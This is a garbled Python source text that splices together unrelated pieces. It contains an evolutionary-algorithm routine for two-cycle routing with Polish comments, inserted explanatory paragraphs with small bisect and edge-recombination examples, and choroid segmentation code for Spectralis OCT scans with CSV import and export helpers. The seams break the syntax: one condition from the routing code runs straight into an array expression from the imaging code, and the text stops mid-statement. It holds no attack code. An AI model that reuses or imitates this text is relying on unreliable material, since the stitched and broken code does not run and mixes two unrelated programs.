hae_cand[h][(i+1)%leng] != hae_2[0][(j+1)%leng]:\n hae_cand[h][(i+1)%leng]=-1\n hae_cand[h][i]=-1\n continue\n if hae_cand[h][i]==hae_2[1][j]: \n if hae_cand[h][(i+1)%leng] != hae_2[1][(j-1)%leng] and hae_cand[h][(i+1)%leng] != hae_2[1][(j+1)%leng]:\n hae_cand[h][(i+1)%leng]=-1\n hae_cand[h][i]=-1\n continue\n # usuwanie pustych wierzcholkow\n for i in range(leng):\n if 
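The surrounding `steepest_list` code maintains a list of improving moves, re-sorting after each application and re-scanning only the affected vertices. The bookkeeping idea reduced to its essentials with `bisect` (the real code additionally validates that a stored move is still applicable before using it):

```python
import bisect

moves = []                            # kept sorted: most negative gain first
for m in [(-5.0, 'a'), (-1.2, 'b'), (-3.4, 'c')]:
    bisect.insort(moves, m)

applied = moves.pop(0)                # best improvement first
print("applied", applied)

bisect.insort(moves, (-2.0, 'd'))     # move discovered after the change
print("queue:", moves)
```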
hae_cand[h][i] != -1 and hae_cand[h][(i-1)%leng] == -1 and hae_cand[h][(i+1)%leng]==-1:\n hae_cand[h][i] = -1\n i = 0\n while i < len(hae_cand[h]):\n if hae_cand[h][i]==-1:\n hae_cand[h].pop(i)\n else:\n i+=1\n # uzupełanianie (rozbudowa cyklu)\n search.first, search.second = solver.cycle_expansion(hae_cand[0],hae_cand[1])\n if types:\n search.steepest_list()\n dist = sum(solver.count_new_dist(search.first))+sum(solver.count_new_dist(search.second))\n \n if hae_1[2]>hae_2[2] and dist < hae_1[2]:\n hae.pop(one)\n hae.append([search.first, search.second,dist])\n if hae_1[2]400)) < len(np.where(iterpo*a[:,0]<400)):\n \n mat[h,0] = 1\n \n else:\n \n mat[h,0] = 1\n \n #Create a length 6 vector for each pixel.\n sm = np.zeros((6,np.shape(a)[0]))\n \n #Cycle through each pixel.\n for i in range(np.shape(a)[0]):\n \n try:\n \n #Populate each length 6 vector with the intensities of the \n # neighborhood of 5 pixels just below each pixel in addition \n # to that pixel.\n sm[:,i] = Ii[a[i,1],a[i,0]:a[i,0]+6]\n \n except:\n \n pass\n \n #Find the maximum intensity pixel from each length 6 vector.\n smi = np.amax(sm, axis=0)\n \n #Store the modified intensity sum.\n mat[h,1] = sum(smi)\n mat[h,2] = h\n \n nnobj = []\n \n #If ind is 1, perform additional object-location-dependent operations.\n if ind == 1:\n \n ai = np.where(mat[:,0]==1)[0]\n \n #Checks if there are objects indexed by mat.\n if len(ai) > 0:\n \n #Sort the objects by modified intensity sum.\n mati = mat[ai,:]\n mati = mati[mati[:,1].argsort(),]\n \n #Append to nnobj the largest object by modified intensity sum.\n nnobj.append(nobj[int(mati[mati.shape[0]-1,2])][0])\n \n #Dead code that would have found objects meeting some\n # object-location-dependent criteria.\n ai = np.where(mat[:,0]==2)[0]\n \n mati = mat[ai,:]\n mati = mati[mati[:,1].argsort(),]\n \n if len(ai) > 0:\n \n nnobj.append(nobj[int(mati[mati.shape[0]-1,2])][0])\n \n #nbc is the final refined completely-connected BM segmentation.\n nbc = np.zeros(bc.shape)\n \n for h in range(np.shape(nnobj)[0]):\n \n a = nnobj[h]\n \n #If the largest object by modified intensity sum has at least 5 pixels,\n # it's a keeper.\n if a.shape[0] > 5:\n \n for l in range(a.shape[0]):\n \n nbc[a[l,0],a[l,1]] = 1\n \n return nbc\n \n #Blur the bscan.\n w = cv2.GaussianBlur(im, (7,7), sigmaX=5, sigmaY=5)\n \n interpo = 2\n \n #Compute the combination of receptive fields on the down-scaled blurred bscan.\n #Find the binarized contour bc for the down-scaled image.\n #Perform a series of morphological operations to refine detected edges.\n #This binarized contour represents the general region-of-interest being analysed \n # above the choroid.\n bc = computeCORF(np.transpose(w[::interpo,::interpo]), 2.5, 0.12, 1)[2]\n se6 = morph.square(6, dtype=np.float64)\n bc_dilated = morph.binary_dilation(bc, se6)\n se4 = morph.square(4, dtype=np.float64)\n bc_eroded = morph.binary_erosion(bc_dilated, se4)\n se1 = morph.disk(1, dtype=np.float64)\n bc_eroded2 = morph.binary_erosion(bc_eroded, se1)\n bc = np.transpose(bc_eroded2)\n \n interpo = 2\n _, N = bc.shape\n O = np.zeros((N, 1))\n O[:,0] = np.NaN\n \n #Isolate leading coordinates of the binarized contour.\n for i in range(N)[::3]:\n \n a = np.where(bc[:,i]==1)\n \n if np.shape(a) != (1,0):\n \n O[i] = a[0][0]\n\n #Fill in gaps and perform lowess smoothing.\n replaceNaNValues(O)\n laydownii = lowess(O[:,0], list(range(N)), 0.05, is_sorted=True, missing='drop', return_sorted=False)\n \n #Up-scale the limiting membrane.\n pre_LM = np.zeros((1536,1))\n 
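The recombination loop above keeps only edges the two parents share, marks orphaned vertices with -1, compacts the cycles, and hands the fragments back to `cycle_expansion` for repair. A toy, order-insensitive version of the destroy step on a single cycle:

```python
# Destroy phase of an edge-based recombination: keep a vertex only if at
# least one of its incident edges also appears in the other parent.
def edge_set(cycle):
    n = len(cycle)
    return {frozenset((cycle[k], cycle[(k + 1) % n])) for k in range(n)}

def destroy_nonshared(parent_a, parent_b):
    keep = edge_set(parent_a) & edge_set(parent_b)
    n = len(parent_a)
    survivors = []
    for k in range(n):
        left = frozenset((parent_a[k - 1], parent_a[k]))
        right = frozenset((parent_a[k], parent_a[(k + 1) % n]))
        if left in keep or right in keep:
            survivors.append(parent_a[k])
    return survivors

a = [0, 1, 2, 3, 4, 5]
b = [0, 2, 1, 3, 5, 4]
print(destroy_nonshared(a, b))   # [1, 2, 4, 5]: only shared fragments remain
```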
pre_LM[:,0] = np.NaN\n pre_LM[::interpo,0] = np.multiply(interpo, laydownii)\n \n #Fill in gaps and perform lowess smoothing.\n replaceNaNValues(pre_LM)\n LM = lowess(pre_LM[:,0], list(range(1536)), 0.05, is_sorted=True, missing='drop', return_sorted=False)\n \n #Find the binarized contour using different CORF parameters. This broader contour \n # is used to treat the area above the choroid in addition to the choroid area.\n _, _, bc = computeCORF(np.transpose(w[::interpo,::interpo]), 4, 0.01, 1)\n bc_dilated = morph.binary_dilation(bc, se6)\n bc_eroded = morph.binary_erosion(bc_dilated, se4)\n bc_eroded2 = morph.binary_erosion(bc_eroded, se1)\n bc = np.transpose(bc_eroded2)\n \n _, N = bc.shape\n O = np.zeros((N,1))\n O[:,0] = np.NaN\n \n #Isolate leading coordinates of the binarized contour.\n for i in range(N)[::3]:\n \n a = np.where(bc[:,i]==1)\n \n if np.shape(a) != (1,0):\n \n O[i] = a[0][0]\n \n #Fill in gaps and perform lowess smoothing.\n replaceNaNValues(O)\n laydowni = lowess(O[:,0], list(range(N)), 0.5, is_sorted=True, missing='drop', return_sorted=False)\n \n mask1 = np.ones(bc.shape, dtype=np.bool_)\n \n #Mask out the region of interest for segmenting the choroid.\n for l in range(len(laydowni)):\n \n try:\n \n mask1[:int(round(laydowni[l]))+1,l] = 0\n \n except:\n \n pass\n \n mask11 = np.ones(bc.shape, dtype=np.bool_)\n \n #Mask out the region not-of-interest inadvertently created by poor image \n # registration.\n for l in range(len(laydowni)):\n \n try:\n \n mask11[int(round(laydowni[l]))+5:,l] = 0\n \n except:\n \n pass\n \n #New addition not in original Matlab code for improved image registration.\n _, _, bc = computeCORF(np.transpose(w[::interpo,::interpo]), 4, 0.08, 1)\n bc_dilated = morph.binary_dilation(bc, se6)\n bc_eroded = morph.binary_erosion(bc_dilated, se4)\n bc_eroded2 = morph.binary_erosion(bc_eroded, se1)\n bc = np.transpose(bc_eroded2)\n \n bc = np.multiply(bc, mask1)\n \n #Find the edge from the binarized contour representing the top of the BM.\n bc3 = refinebmoampcr(bc, np.transpose(im[::interpo,::interpo]), 1, interpo)\n \n a,b = np.where(bc3 > 0)\n \n #Get a one-to-one representation of the top of the BM then smooth.\n O = np.zeros((N,1))\n O[b,0] = a\n O[::2,0] = np.NaN\n \n replaceNaNValues(O)\n layup = lowess(O[:,0], list(range(N)), 0.1, is_sorted=True, missing='drop', return_sorted=False)\n \n #Fill mask to 20 pixels below the top of the BM.\n mask2 = np.ones(bc.shape, dtype=np.bool_)\n \n for l in range(len(layup)):\n \n try:\n \n mask2[int(round(layup[l]))+20:,l] = 0\n \n except:\n \n pass\n \n #Create up-scaled version of the top of the BM segmentation.\n BM = np.zeros((1536,1))\n BM[:,0] = np.NaN\n BM[::interpo,0] = np.multiply(interpo, layup)\n \n #Smooth it twice.\n replaceNaNValues(BM)\n BM = lowess(BM[:,0], list(range(1536)), 0.05, is_sorted=True, missing='drop', return_sorted=False)\n BMi = lowess(BM, list(range(1536)), 0.2, is_sorted=True, missing='drop', return_sorted=False)\n \n #Choroid upper bound estimate up-scaled segmentation.\n CHR = np.zeros((1536,1))\n CHR[:,0] = np.NaN\n CHR[::interpo,0] = np.multiply(interpo, laydowni)\n \n replaceNaNValues(CHR)\n CHR = lowess(CHR[:,0], list(range(1536)), 0.05, is_sorted=True, missing='drop', return_sorted=False)\n \n #BMim is the composite of the LM, BMi, and CHR segmentations.\n BMim = np.zeros(im.shape)\n \n for i in range(len(BM)):\n \n try:\n \n BMim[int(round(LM[i])),i] = 1\n BMim[int(round(BMi[i])),i] = 1\n BMim[int(round(CHR[i])),i] = 1\n \n except:\n \n pass\n \n #BMimr is the composite of 
the BMi and CHR segmentations.\n BMimr = np.zeros(im.shape)\n \n for i in range(len(BM)):\n \n try:\n \n BMimr[int(round(BMi[i])),i] = 1\n BMimr[int(round(CHR[i])),i] = 1\n \n except:\n \n pass\n \n #Down-scale a copy of the bscan.\n newB = im\n newBi = newB[::interpo,::interpo]\n \n #Mask the original binarized contour by the composite of mask1 and mask2.\n bc = np.multiply(bc, np.multiply(mask1, mask2))\n\n mask3 = np.ones(bc.shape, dtype=np.bool_)\n \n #Down-scale the Spectralis-segmented Bruch's Membrane.\n BMM = old_div(BMM[::interpo],interpo)\n \n #Create a mask for below the original Spectralis-segmented BM.\n for l in range(len(BMM)):\n \n try:\n \n mask3[:int(round(BMM[l]))+1,l] = 0\n \n except:\n \n pass\n \n #Mask out the region above the original Spectralis-segmented BM.\n bc = np.multiply(bc, mask3)\n \n count = 0\n #Cycle through long-axis indices.\n for iop in range(bc.shape[1]):\n \n #Find the coordinates in each column.\n ao = bc[:,iop]\n zz = np.where(ao > 0)\n \n #Increment count for each nonempty column.\n if np.shape(zz) != (1,0):\n \n count += 1\n \n bc01 = bc\n \n test_ONHRC_radial = False\n #If ratio of number of nonempty columns to total columns <0.65:\n # Use larger Gaussian kernel, denoise, recompute CORF, and apply morph-ops.\n if float(count)/len(BMM) < 0.65:\n \n w = cv2.GaussianBlur(im, (21,21), sigmaX=20, sigmaY=20)\n \n #restore_imagev2 is computationally expensive.\n if not test_ONHRC_radial:\n \n AA = denoise.restore_imagev2(w.astype(float)[::interpo,::interpo]-20, 50, 200, 0.02, 1)\n \n else:\n \n AA = im.astype(float)[::interpo,::interpo]-20\n \n _, _, bc01 = computeCORF(np.transpose(AA), 3, 0.0605, 11)\n \n bc01 = np.transpose(bc01)\n \n #Note that we add bc and bc01 together here (original + denoised).\n bc = morph.remove_small_objects(bc+bc01, 5, connectivity=8)\n bc_dilated = morph.binary_dilation(bc, se6)\n bc_eroded = morph.binary_erosion(bc_dilated, se4)\n bc_eroded2 = morph.binary_erosion(bc_eroded, se1)\n bc01 = bc\n \n #Mask out the region above the original Spectralis-segmented BM for new contour.\n bc = np.multiply(bc01, np.multiply(mask3, newBi))\n \n count = 0\n #Cycle through long-axis indices.\n for iop in range(bc.shape[1]):\n \n #Find the coordinates in each column.\n ao = bc[:,iop]\n zz = np.where(ao > 0)\n \n #Increment count for each nonempty column.\n if np.shape(zz) != (1,0):\n \n count += 1\n \n bc01 = bc\n \n #If ratio of number of nonempty columns to total columns <0.60:\n # Do same as for when <0.65 but with different computeCORF parameters.\n if float(count)/len(BMM) < 0.6:\n \n w = cv2.GaussianBlur(im, (21,21), sigmaX=20, sigmaY=20)\n \n if not test_ONHRC_radial:\n #restore_imagev2 is expensive.\n AA = denoise.restore_imagev2(w.astype(float)[::interpo,::interpo]-20, 50, 200, 0.02, 1)\n \n else:\n \n AA = im.astype(float)[::interpo,::interpo]-20\n \n _, _, bc01 = computeCORF(np.transpose(AA), 5, 0.001, 1)\n \n bc01 = np.transpose(bc01)\n \n #Note that we add bc and bc01 together here (previous + denoised).\n bc = morph.remove_small_objects(bc.astype(np.bool_)+bc01, 5, connectivity=8)\n bc_dilated = morph.binary_dilation(bc, se6)\n bc_eroded = morph.binary_erosion(bc_dilated, se4)\n bc_eroded2 = morph.binary_erosion(bc_eroded, se1)\n bc01 = bc\n \n #Mask out the bscan above the Spectralis BM and outside of the new contour.\n AA = np.multiply(bc01, np.multiply(newBi, mask3))\n AA = np.transpose(AA)\n \n if test_ONHRC_radial:\n AA = expose.rescale_intensity(AA, out_range=(0,255.0))\n AA[np.where(AA < 8)] = 0.0\n \n #Create a 
one-to-one segmentation from AA.\n OO = np.zeros((AA.shape[0], 1))\n OO[:,0] = np.NaN\n \n #Cycle through each column.\n for iop in range(AA.shape[0]):\n \n #Find the coordinates in each column.\n ao = AA[iop,:]\n zz = np.where(ao > 0)\n \n if np.shape(zz) != (1,0):\n \n OO[iop,0] = zz[0][-1]\n \n #Fill in holes and smooth.\n replaceNaNValues(OO)\n laydownii = lowess(OO[:,0], list(range(AA.shape[0])), 0.25, is_sorted=True, missing='drop', return_sorted=False)\n \n #Up-scale and format the BM and final choroid segmentations.\n BMM = interpo*BMM+1\n laydownii = interpo*laydownii+1\n\n x = list(range(1536))\n \n BMM_one_to_one = np.zeros(1536)\n BMM_one_to_one[:] = np.NaN\n BMM_one_to_one[::2] = BMM\n replaceNaNValues(BMM_one_to_one)\n CHR_top = np.zeros((1536,2))\n CHR_top[:,0] = x\n CHR_top[:,1] = BMM_one_to_one\n \n laydownii_one_to_one = np.zeros(1536)\n laydownii_one_to_one[:] = np.NaN\n laydownii_one_to_one[::2] = laydownii\n replaceNaNValues(laydownii_one_to_one)\n CHR_bottom = np.zeros((1536,2))\n CHR_bottom[:,0] = x\n CHR_bottom[:,1] = laydownii_one_to_one\n \n return CHR_top, CHR_bottom\n\ndef compute_choroid_mean_depth(CHR_top, CHR_bot, pixel2micron_constant):\n '''\n Compute the mean depth of the choroid from the segmentation file.\n \n @param CHR_top: The array of points comprising the upper boundary of the \n choroid.\n @param CHR_bot: The array of points comprising the lower boundary of the \n choroid.\n \n @return: CHR_mean_depth, a float representing the mean depth of the \n entire choroid from the bottom of the Bruch's Membrane.\n '''\n \n CHR_diff = CHR_bot[:,1] - CHR_top[:,1]\n CHR_mean_depth = np.nanmean(CHR_diff) * pixel2micron_constant\n print(str(CHR_mean_depth) + ' ums')\n \n return CHR_mean_depth\n\ndef segment_and_measure_choroid_CIRCLE(vol_path, FLEX=False):\n '''\n A wrapper for the choroid segmentation algorithm and for the calculation of the \n global mean depth of the choroid.\n \n @param vol_path: Absolute path to the volume scan being segmented.\n @param FLEX: True if scan has dimensions 768x496x1 (a FLEX machine scan).\n \n @return: CHR_top, segmentation representing the top of the choroid; \n CHR_bottom, segmentation representing the bottom of the choroid; \n CHR_mean_depth, float representing the global mean depth of the \n choroid.\n '''\n \n vol_data = spectools.readSpectralisData(vol_path)\n allB = vol_data['VOLUME'][0]\n bscan = allB['BSCAN']\n He_segs = allB['SegArray']\n BMM = He_segs[1]\n \n if FLEX:\n \n #Resize to adapt to the choroid segmentation algorithm.\n resized_bscan = cv2.resize(bscan, None, fx=2, fy=1, interpolation=cv2.INTER_CUBIC)\n \n resized_BMM = np.zeros((1536,))\n resized_BMM[:] = np.NaN\n resized_BMM[::2] = BMM\n resized_BMM = replaceNaNValues(resized_BMM)\n \n bscan = resized_bscan\n BMM = resized_BMM\n \n CHR_top, CHR_bottom = findchrv10(bscan, BMM)\n \n if FLEX:\n \n # Resize to original dimensions.\n CHR = np.zeros((768,2))\n BM = np.zeros((768,2))\n CHR[:,0] = list(range(768))\n BM[:,0] = list(range(768))\n CHR[:,1] = CHR_bottom[::2,1]\n BM[:,1] = CHR_top[::2,1]\n \n else:\n\n CHR = copy.copy(CHR_bottom)\n BM = copy.copy(CHR_top)\n \n # Clamp to below BM and NaN-ize unsegmented columns.\n diff = CHR[:,1] - BM[:,1]\n negs = np.where(diff < 0)\n \n large_BM = np.where(BM[:,1] >= 496)\n large_CHR = np.where(CHR[:,1] >= 496)\n \n if np.shape(negs)[1] > 0:\n \n CHR[negs,1] = BM[negs,1]\n \n if np.shape(large_BM)[1] > 0 or np.shape(large_CHR)[1] > 0:\n \n BM[large_BM,1] = np.NaN\n CHR[large_CHR,1] = np.NaN\n \n 
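# NOTE: the conversion that follows turns ScaleZ (millimetres per pixel along the
# depth axis) into microns per pixel. As a hypothetical worked example (values not
# from the source): ScaleZ = 0.0039 mm/px gives 0.0039 * 1000 = 3.9 um/px, so a mean
# boundary separation of 70 px corresponds to roughly 70 * 3.9 = 273 um of choroid.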
pixel2micron_constant = float(vol_data['ScaleZ']) * 1000\n CHR_mean_depth = compute_choroid_mean_depth(BM, CHR, pixel2micron_constant)\n \n return CHR_top, CHR_bottom, CHR_mean_depth\n\ndef segment_and_measure_choroid_ONHRC(vol_path):\n '''\n A wrapper for the choroid segmentation algorithm and for the calculation \n of the global mean depth of the choroid performed on circle bscans found \n in ONH-RC scans.\n \n @param vol_path: Absolute path to the volume scan being segmented.\n \n @return: CHR_tops, segmentations representing the top of the choroid; \n CHR_bottoms, segmentations representing the bottom of the choroid; \n CHR_mean_depths, floats representing the global mean depth of the \n choroid.\n '''\n\n vol_data = spectools.readSpectralisData(vol_path)\n allB = vol_data['VOLUME'][24:]\n \n bscans = []\n CHR_tops = []\n CHR_bottoms = []\n CHR_mean_depths = []\n \n for B in allB:\n \n bscan = B['BSCAN']\n He_segs = B['SegArray']\n BMM = He_segs[1]\n \n #Resize to adapt to the choroid segmentation algorithm.\n resized_bscan = cv2.resize(bscan, None, fx=2, fy=1, interpolation=cv2.INTER_CUBIC)\n \n resized_BMM = np.zeros((1536,))\n resized_BMM[:] = np.NaN\n resized_BMM[::2] = BMM\n resized_BMM = replaceNaNValues(resized_BMM)\n \n bscans.append(resized_bscan)\n \n CHR_top, CHR_bottom = findchrv10(resized_bscan, resized_BMM)\n \n # Resize to original dimensions.\n CHR = np.zeros((768,2))\n BM = np.zeros((768,2))\n CHR[:,0] = list(range(768))\n BM[:,0] = list(range(768))\n CHR[:,1] = CHR_bottom[::2,1]\n BM[:,1] = CHR_top[::2,1]\n \n # Clamp to below BM and NaN-ize unsegmented columns.\n diff = CHR[:,1] - BM[:,1]\n negs = np.where(diff < 0)\n \n large_BM = np.where(BM[:,1] >= 496)\n large_CHR = np.where(CHR[:,1] >= 496)\n \n if np.shape(negs)[1] > 0:\n \n CHR[negs,1] = BM[negs,1]\n \n if np.shape(large_BM)[1] > 0 or np.shape(large_CHR)[1] > 0:\n \n BM[large_BM,1] = np.NaN\n CHR[large_CHR,1] = np.NaN\n \n CHR_tops.append(BM)\n CHR_bottoms.append(CHR)\n \n pixel2micron_constant = float(vol_data['ScaleZ']) * 1000\n CHR_mean_depth = compute_choroid_mean_depth(BM, CHR, pixel2micron_constant)\n CHR_mean_depths.append(CHR_mean_depth)\n \n return CHR_tops, CHR_bottoms, CHR_mean_depths\n\ndef segment_and_measure_choroid_MAC(vol_path):\n '''\n A wrapper for the choroid segmentation algorithm and for the calculation \n of the global mean depth of the choroid performed on macula cube scans.\n \n @param vol_path: Absolute path to the volume scan being segmented.\n \n @return: CHR_tops, segmentations representing the top of the choroid; \n CHR_bottoms, segmentations representing the bottom of the choroid; \n CHR_mean_depths, floats representing the global mean depth of the \n choroid.\n '''\n \n vol_data = spectools.readSpectralisData(vol_path)\n allB = vol_data['VOLUME']\n \n bscans = []\n CHR_tops = []\n CHR_bottoms = []\n CHR_mean_depths = []\n b = 0\n \n for B in allB:\n \n b += 1\n print(\"CHR: Working on bscan %i...\" % b)\n bscan = B['BSCAN']\n He_segs = B['SegArray']\n BMM = He_segs[1]\n \n #Resize to adapt to the choroid segmentation algorithm.\n resized_bscan = cv2.resize(bscan, None, fx=2, fy=1, interpolation=cv2.INTER_CUBIC)\n \n resized_BMM = np.zeros((1536,))\n resized_BMM[:] = np.NaN\n resized_BMM[::2] = BMM\n resized_BMM = replaceNaNValues(resized_BMM)\n \n bscans.append(resized_bscan)\n \n CHR_top, CHR_bottom = findchrv10(resized_bscan, resized_BMM)\n \n # Resize to original dimensions.\n CHR = np.zeros((768,2))\n BM = np.zeros((768,2))\n CHR[:,0] = list(range(768))\n BM[:,0] = 
list(range(768))\n CHR[:,1] = CHR_bottom[::2,1]\n BM[:,1] = CHR_top[::2,1] \n \n # Clamp to below BM and NaN-ize unsegmented columns.\n diff = CHR[:,1] - BM[:,1]\n negs = np.where(diff < 0)\n \n large_BM = np.where(BM[:,1] >= 496)\n large_CHR = np.where(CHR[:,1] >= 496)\n \n if np.shape(negs)[1] > 0:\n \n CHR[negs,1] = BM[negs,1]\n \n if np.shape(large_BM)[1] > 0 or np.shape(large_CHR)[1] > 0:\n \n BM[large_BM,1] = np.NaN\n CHR[large_CHR,1] = np.NaN\n \n CHR_tops.append(BM)\n CHR_bottoms.append(CHR)\n \n pixel2micron_constant = float(vol_data['ScaleZ']) * 1000\n CHR_mean_depth = compute_choroid_mean_depth(BM, CHR, pixel2micron_constant)\n CHR_mean_depths.append(CHR_mean_depth)\n \n return CHR_tops, CHR_bottoms, CHR_mean_depths\n\ndef segment_CHR(vol_path):\n '''\n Performs segmentation of the choroid on the VOLUME data from a Spectralis \n circle scan at vol_path or the circle scans from a ONH-RC radial scan at \n vol_path.\n \n @param vol_path: A Spectralis ONH-RC radial scan or circle scan volume \n export path.\n \n @return: CHR_top(s), CHR_bottom(s), and CHR_mean_depth(s), the raw segmentation \n output data parametrizing the choroid segmentation.\n '''\n \n vol_data = spectools.readSpectralisMetadata(vol_path)\n \n if (vol_data['SIZEX'] == 1536 \n and vol_data['SIZEZ'] == 496 \n and vol_data['NBSCAN'] == 1):\n \n CHR_top, CHR_bottom, CHR_mean_depth = segment_and_measure_choroid_CIRCLE(vol_path)\n return CHR_top, CHR_bottom, CHR_mean_depth\n\n elif (vol_data['SIZEX'] == 768 \n and vol_data['SIZEZ'] == 496 \n and vol_data['NBSCAN'] == 27):\n\n CHR_tops, CHR_bottoms, CHR_mean_depths = segment_and_measure_choroid_ONHRC(vol_path)\n return CHR_tops, CHR_bottoms, CHR_mean_depths\n \n elif (vol_data['SIZEX'] == 768 \n and vol_data['SIZEZ'] == 496 \n and vol_data['NBSCAN'] == 1):\n \n CHR_top, CHR_bottom, CHR_mean_depth = segment_and_measure_choroid_CIRCLE(vol_path, FLEX=True)\n return CHR_top, CHR_bottom, CHR_mean_depth\n \n elif (vol_data['SIZEX'] == 768 \n and vol_data['SIZEZ'] == 496 \n and vol_data['NBSCAN'] == 73):\n \n CHR_tops, CHR_bottoms, CHR_mean_depths = segment_and_measure_choroid_MAC(vol_path)\n return CHR_tops, CHR_bottoms, CHR_mean_depths\n \n elif (vol_data['SIZEX'] == 768 \n and vol_data['SIZEZ'] == 496 \n and vol_data['NBSCAN'] == 121):\n \n CHR_tops, CHR_bottoms, CHR_mean_depths = segment_and_measure_choroid_MAC(vol_path)\n return CHR_tops, CHR_bottoms, CHR_mean_depths\n \n else:\n \n return None\n\ndef export_CHR_segmentation_to_csv(CHR, out_dir):\n '''\n Writes the choroid segmentation to CHR_csv_path.\n \n @param CHR: The choroid segmentation.\n @param CHR_csv_path: Absolute path to the output csv.\n \n @return: None.\n '''\n \n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n \n with open(os.path.join(out_dir, 'CHR.csv'), 'w') as csvfile:\n \n csvwriter = csv.writer(csvfile)\n \n header = ['Column']\n header.extend(list(map(str, list(range(CHR.shape[0])))))\n csvwriter.writerow(header)\n \n row = ['Choroid']\n row.extend(list(map(str, CHR[:,1])))\n csvwriter.writerow(row)\n \n return None\n\ndef import_CHR_segmentation_from_csv(CHR_csv_path):\n '''\n Generates a 1536x2 numpy array of choroid points from a csv export of the choroid\n segmentation found at CHR_csv_path.\n \n @param CHR_csv_path: Absolute path to a choroid csv export.\n \n @return: CHR, a 1536x2 numpy array of CHR points.\n '''\n \n csvfile = open(CHR_csv_path, 'r')\n reader = csv.reader(csvfile)\n CHR0 = list(map(int, next(reader, None)[1:]))\n CHR1 = list(map(float, next(reader, None)[1:]))\n CHR 
= np.zeros((len(CHR0), 2))\n CHR[:,0] = CHR0\n CHR[:,1] = CHR1\n \n return CHR\n\ndef export_BM_Spectralis_segmentation_to_csv(BM_Spectralis, out_dir):\n '''\n Writes a BM segmentation to csv file at BM_csv_path.\n \n @param BM_Spectralis: The BM segmentation from a Spectralis volume.\n @param BM_csv_path: Absolute path to the output csv.\n \n @return: None.\n '''\n\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n \n with open(os.path.join(out_dir, 'BM_Spec.csv'), 'w') as csvfile:\n \n csvwriter = csv.writer(csvfile)\n \n header = ['Column']\n header.extend(list(map(str, list(range(BM_Spectralis.shape[0])))))\n csvwriter.writerow(header)\n \n row = ['BM_Spectralis']\n row.extend(list(map(str, BM_Spectralis[:,1])))\n csvwriter.writerow(row)\n \n return None\n\ndef import_BM_Spectralis_segmentation_from_csv(BM_csv_path):\n '''\n Generates a 1536x2 numpy array of BM points from a csv export of the BM \n Spectralis segmentation as a csv file found at BM_csv_path.\n \n @param BM_csv_path: Absolute path to a BM Spectralis csv export.\n \n @return: BM_Spectralis, a 1536x2 numpy array of BM points.\n '''\n \n csvfile = open(BM_csv_path, 'r')\n reader = csv.reader(csvfile)\n CHR0 = list(map(int, next(reader, None)[1:]))\n CHR1 = list(map(float, next(reader, None)[1:]))\n CHR = np.zeros((len(CHR0), 2))\n CHR[:,0] = CHR0\n CHR[:,1] = CHR1\n \n return CHR\n\ndef export_CHR_depth_to_csv(CHR_depth, out_dir):\n '''\n Generates a csv file containing the choroid mean depth CHR_depth.\n \n @param CHR_depth: The choroid mean depth as a float in microns.\n @param out_dir: The destination directory.\n \n @return: None.\n '''\n \n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n \n with open(os.path.join(out_dir, 'CHR_depth.csv'), 'w') as csvfile:\n \n writer = csv.writer(csvfile)\n \n row = ['Choroid Global Mean Depth (ums)', '{:.3f}'.format(float(CHR_depth))]\n writer.writerow(row)\n \n return None\n\ndef import_CHR_depth_from_csv(CHR_depth_csv_path):\n '''\n Reads the CHR_depth value from its csv export.\n \n @param CHR_depth_csv_path: Absolute path to a CHR_depth csv export.\n \n @return: CHR_depth, a float in microns.\n '''\n \n csvfile = open(CHR_depth_csv_path, 'r')\n reader = csv.reader(csvfile)\n CHR_depth = float(next(reader)[1])\n \n return CHR_depth\n\ndef segment_and_export_CHR(vol_path, out_dir, draw=False):\n '''\n Runs the choroid segmentation algorithm on a volume scan at vol_path and \n saves the output to out_dir. Includes annotated bscans if draw == True.\n \n @param vol_path: Path to a Spectralis volume. 
Must be ONH-RC or CIRCLE.\n @param out_dir: Path to save output to.\n @param draw: If draw == True, draw the choroid on the circle scan and save.\n \n @return: None.\n '''\n \n metadata = spectools.readSpectralisMetadata(vol_path)\n scan_type = preprocess.find_scan_type(metadata)\n CHRt, CHRb, CHRmd = segment_CHR(vol_path)\n \n if scan_type == 'CIRCLE01' or scan_type == 'CIRCLE01-FLEX':\n \n #Save the output.\n export_BM_Spectralis_segmentation_to_csv(CHRt, out_dir)\n export_CHR_segmentation_to_csv(CHRb, out_dir)\n export_CHR_depth_to_csv(CHRmd, out_dir)\n \n if draw:\n \n vol_data = spectools.readSpectralisData(vol_path)\n volume = vol_data['VOLUME']\n bscan = volume[0]\n #plottools.draw.draw_choroid(bscan, CHRt, CHRb, out_dir)\n \n elif scan_type == 'ONH27-RC':\n \n out_subdirs = [os.path.join(out_dir, 'bscan-{}'.format(i)) for i in range(25,28)]\n \n for i, out_subdir in enumerate(out_subdirs):\n\n if not os.path.exists(out_subdir):\n \n os.makedirs(out_subdir)\n \n #Save output.\n export_BM_Spectralis_segmentation_to_csv(CHRt[i], out_subdir)\n export_CHR_segmentation_to_csv(CHRb[i], out_subdir)\n export_CHR_depth_to_csv(CHRmd[i], out_subdir)\n \n if draw:\n \n vol_data = spectools.readSpectralisData(vol_path)\n volume = vol_data['VOLUME']\n \n for b in range(24,27):\n \n bscan = volume[b]\n #plottools.draw.draw_choroid(bscan, CHRt[24-b], CHRb[24-b], out_subdirs[24-b], ONHRC=True)\n \n elif scan_type == '121-CUBE' or scan_type == '73-CUBE':\n \n B = metadata['NBSCAN']\n out_subdirs = [os.path.join(out_dir, 'bscan-{}'.format(i)) for i in range(1,B+1)]\n \n for i, out_subdir in enumerate(out_subdirs):\n\n if not os.path.exists(out_subdir):\n \n os.makedirs(out_subdir)\n \n #Save output.\n export_BM_Spectralis_segmentation_to_csv(CHRt[i], out_subdir)\n export_CHR_segmentation_to_csv(CHRb[i], out_subdir)\n export_CHR_depth_to_csv(CHRmd[i], out_subdir)\n \n if draw:\n \n vol_data = spectools.readSpectralisData(vol_path)\n volume = vol_data['VOLUME']\n \n for b in range(B):\n \n bscan = volume[b]\n #draw.draw_choroid(bscan, CHRt[b], CHRb[b], out_subdirs[b], ONHRC=True)\n \n return None\n\ndef segment_and_export_many_CHR(vols_dir, out_dir, draw=False):\n '''\n Runs the choroid segmentation algorithm on every volume scan in a directory \n of volumes vols_dir and saves output in out_dir. Includes annotated bscans \n if draw == True.\n \n @param vols_dir: Absolute path to a text file of paths to circle scan volumes.\n @param out_dir: Directory where output will be saved.\n @param draw: If draw == True, draw the choroid upon the circle scans and save.\n \n @return: None\n '''\n \n vol_paths = [os.path.join(vols_dir, vol) for vol in 